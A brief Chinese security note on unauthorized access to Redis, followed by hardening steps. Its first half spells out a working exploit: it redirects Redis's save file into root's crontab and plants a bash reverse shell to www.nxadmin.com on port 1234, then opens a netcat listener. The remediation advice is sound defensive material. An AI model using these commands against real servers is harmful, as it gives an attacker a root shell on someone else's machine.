检查漏洞:
redis-cli -h remoteip 连接远程redis
config set dir /var/spool/cron 设置目录
config set dbfilename root 设置配置文件
set 1 “\n\n\n* * * * * bash -i >& /dev/tcp/www.nxadmin.com/1234 0>&1\n\n\n”
如果删除del 1
save 保存
netcat -l -vv -p 1234 设置监听
修复漏洞:
redis.conf 中配置requirepass项,增加复杂的访问密码
redis.conf :bind 127.0.0.1
限定可以连接redis服务器的ip
禁止使用root权限启动redis服务
修改redis默认端口6379